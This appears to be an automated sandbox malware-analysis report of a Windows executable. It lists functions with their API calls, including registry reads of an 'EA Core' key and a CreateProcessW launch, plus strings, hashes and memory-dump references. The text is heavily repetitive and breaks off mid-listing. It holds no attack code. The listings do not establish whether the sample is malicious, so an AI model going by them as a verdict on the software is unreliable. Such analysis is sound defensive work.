                                                                                                                                                      • Opcode ID: 80bbff2313622aef98a3b749ba6f0eed36fbf8023f7dfeddaf6998f980f6238c
                                                                                                                                                      • Instruction ID: c60df709e1acc720f731806fd25f3312cafaa5f327fe4214f5e428acaeea59b3
                                                                                                                                                      • Opcode Fuzzy Hash: 80bbff2313622aef98a3b749ba6f0eed36fbf8023f7dfeddaf6998f980f6238c
                                                                                                                                                      • Instruction Fuzzy Hash: 1B711472600345AFCB15DF78CC81AEB7BA5AF44314F18857FE4129B282D338D986C755
                                                                                                                                                      Function 00404010 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 200processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00412E30: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Electronic Arts\EA Core,C6FB9493), ref: 00412E93
                                                                                                                                                        • Part of subcall function 00412E30: RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,?,00000000,C6FB9493,00000000), ref: 00412EB9
                                                                                                                                                        • Part of subcall function 00412E30: RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,80070057,?,00000000,C6FB9493,00000000), ref: 00412F19
                                                                                                                                                      • __wcsicoll.LIBCMT ref: 004040D6
                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 0040416E
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 004041A8
                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004041C8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$CreateException@8ExistsFileInfoOpenPathProcessStartupThrow__wcsicoll
                                                                                                                                                      • String ID: ClientPath$ClientVersion$D$TASK_LAUNCH_VAULT$taskId
                                                                                                                                                      • API String ID: 250433368-3794618676
                                                                                                                                                      • Opcode ID: 08c08dd2a7f5c98b7fc6987f10198b84985c4a5a63c51848e293be478a0b1cbe
                                                                                                                                                      • Instruction ID: 76b1966acc7033ab64905c1a3fd4d20a6124fa36ab320636d25b5177588580d5
                                                                                                                                                      • Opcode Fuzzy Hash: 08c08dd2a7f5c98b7fc6987f10198b84985c4a5a63c51848e293be478a0b1cbe
                                                                                                                                                      • Instruction Fuzzy Hash: 2A71C270A00604DFDB00DFA8C885B9EB7B4FF99324F148269E525AB3E1D7399A45CB94
                                                                                                                                                      Function 00405D40 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 336COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004060D2
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004060E7
                                                                                                                                                        • Part of subcall function 00401850: _memmove_s.LIBCMT ref: 004018C7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_malloc_memmove_sstd::exception::exception
                                                                                                                                                      • String ID: %I64d$%lu$CommandIndex$PrevCommand$xsB
                                                                                                                                                      • API String ID: 1860171432-3474438254
                                                                                                                                                      • Opcode ID: 96eaf29f573fc05d54491307b7f3db57108491e08cc3f2a4a95e96654d7aa1aa
                                                                                                                                                      • Instruction ID: c5004cb68efb67194c6f87c48ca3711ded65f2a9143ef5647ee9976fbfe6ad8a
                                                                                                                                                      • Opcode Fuzzy Hash: 96eaf29f573fc05d54491307b7f3db57108491e08cc3f2a4a95e96654d7aa1aa
                                                                                                                                                      • Instruction Fuzzy Hash: A3D19171A00605DFDB04DF9DC880AAEB7B5FF88314F24826AE515AB391D738AE05CB95
                                                                                                                                                      Function 00404260 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 221COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcsicoll
                                                                                                                                                      • String ID: Console added to log output$Could not add file %s to log$File %s added to log$console$false$file
                                                                                                                                                      • API String ID: 3832890014-2584448219
                                                                                                                                                      • Opcode ID: 1a08a012ac65999c8174157735e916b28457271b0fadf02bb8d59d74e1470fdb
                                                                                                                                                      • Instruction ID: a8fcaa21e284d30e8fecf8c9f0b476e71f75c2b91a7b52cfa491ca81cfd6bdde
                                                                                                                                                      • Opcode Fuzzy Hash: 1a08a012ac65999c8174157735e916b28457271b0fadf02bb8d59d74e1470fdb
                                                                                                                                                      • Instruction Fuzzy Hash: BC81B971600605DFDB04DB68C841B9EB7B5FF85324F14836EE525AB3E1D734A905CBA4
                                                                                                                                                      Function 00412E30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Electronic Arts\EA Core,C6FB9493), ref: 00412E93
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,?,00000000,C6FB9493,00000000), ref: 00412EB9
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,80070057,?,00000000,C6FB9493,00000000), ref: 00412F19
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      • _wcsnlen.LIBCMT ref: 00412F30
                                                                                                                                                      • RegCloseKey.ADVAPI32(C6FB9493,?,00000000,C6FB9493,00000000), ref: 00412F52
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Electronic Arts\EA Core, xrefs: 00412E7B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$CloseException@8OpenThrow_wcsnlen
                                                                                                                                                      • String ID: SOFTWARE\Electronic Arts\EA Core
                                                                                                                                                      • API String ID: 922926716-227494909
                                                                                                                                                      • Opcode ID: 75133fe29f0d75d512c43b9e2b8e0231faae1fa167434d0b11c600b6562343be
                                                                                                                                                      • Instruction ID: 7a639c6b66232bf2a509c11970b60c131960bb7f6978763a11664d3db71cf0c1
                                                                                                                                                      • Opcode Fuzzy Hash: 75133fe29f0d75d512c43b9e2b8e0231faae1fa167434d0b11c600b6562343be
                                                                                                                                                      • Instruction Fuzzy Hash: 134179B1A00209AFDB10DF99DD84AAEF7F9FF88314F20496EE505E7250D778A9418B94
                                                                                                                                                      Function 00401D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00401DE6
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00401DFB
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00401E0A
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00401E1F
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB$xsB
                                                                                                                                                      • API String ID: 2621100827-68959868
                                                                                                                                                      • Opcode ID: 8215094215c13d6a3dcd50be55ae5cf5bf2f7228950e984a2d85efd7248c176d
                                                                                                                                                      • Instruction ID: 778eb612fba3b6ce96523c047d895c47cfc0f6d1dfa00d93fd7411120063d9d5
                                                                                                                                                      • Opcode Fuzzy Hash: 8215094215c13d6a3dcd50be55ae5cf5bf2f7228950e984a2d85efd7248c176d
                                                                                                                                                      • Instruction Fuzzy Hash: DE4159B5A406048FC710CF69D880A9AFBF0FF98314B54C66FE85997741E738EA04CBA5
                                                                                                                                                      Function 00404DE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404E99
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404EAE
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404EBD
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404ED2
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB$xsB
                                                                                                                                                      • API String ID: 2621100827-68959868
                                                                                                                                                      • Opcode ID: eff2206f4909ef7f00548ec5c40d9041846c228344b7a7bf0811809fc827db25
                                                                                                                                                      • Instruction ID: 63f6167787b5849e1bf8a21454d71ba3d6dd6c242267a25200910bc6f432d0b2
                                                                                                                                                      • Opcode Fuzzy Hash: eff2206f4909ef7f00548ec5c40d9041846c228344b7a7bf0811809fc827db25
                                                                                                                                                      • Instruction Fuzzy Hash: 52316BB1A00204CFCB10DFA8D881B9AB7F4FF88314F148A6EE555A7781D738A904CBA4
                                                                                                                                                      Function 0041C5B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _malloc.LIBCMT ref: 0041C5C1
                                                                                                                                                        • Part of subcall function 00415170: __FF_MSGBANNER.LIBCMT ref: 00415189
                                                                                                                                                        • Part of subcall function 00415170: __NMSG_WRITE.LIBCMT ref: 00415190
                                                                                                                                                        • Part of subcall function 00415170: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00416F22,?,00000001,?,?,0041B525,00000018,0042D5F0,0000000C,0041B5B5), ref: 004151B5
                                                                                                                                                      • _free.LIBCMT ref: 0041C5D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocHeap_free_malloc
                                                                                                                                                      • String ID: AcB
                                                                                                                                                      • API String ID: 2734353464-1478174269
                                                                                                                                                      • Opcode ID: 8b6c01779e3b714c63fddf65fb88cc6ff26c2e2c4537bd79e95977f20cc853d5
                                                                                                                                                      • Instruction ID: 3fbff88a0494120e4650b485aa6fdb2f7ac20307385e551b3c582f91f470e137
                                                                                                                                                      • Opcode Fuzzy Hash: 8b6c01779e3b714c63fddf65fb88cc6ff26c2e2c4537bd79e95977f20cc853d5
                                                                                                                                                      • Instruction Fuzzy Hash: 4F11E732984214ABCB212B75BC457DB3B959F843A4F20152BF80597251DF7C89D19A9C
                                                                                                                                                      Function 00416714 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D4B8,00000008,0041681C,00000000,00000000,?,?,00414408,004136EF), ref: 00416725
                                                                                                                                                      • __lock.LIBCMT ref: 00416759
                                                                                                                                                        • Part of subcall function 0041B59A: __mtinitlocknum.LIBCMT ref: 0041B5B0
                                                                                                                                                        • Part of subcall function 0041B59A: __amsg_exit.LIBCMT ref: 0041B5BC
                                                                                                                                                        • Part of subcall function 0041B59A: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041675E,0000000D), ref: 0041B5C4
                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00416766
                                                                                                                                                      • __lock.LIBCMT ref: 0041677A
                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00416798
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
